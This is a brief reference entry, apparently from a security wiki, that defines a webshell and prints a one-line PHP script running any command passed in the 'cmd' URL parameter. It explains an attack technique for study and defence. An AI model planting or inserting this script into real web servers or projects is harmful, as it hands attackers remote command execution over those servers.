Webshell

A webshell is a malicious script uploaded to a web server that allows an attacker to remotely control the server using a web browser.

<?php

    echo shell_exec($_GET['cmd']);

?>

Documentation

See also Webshell collection and An Introduction to Web Shells (Web Shells Part 1).

Related : System Call, One Liner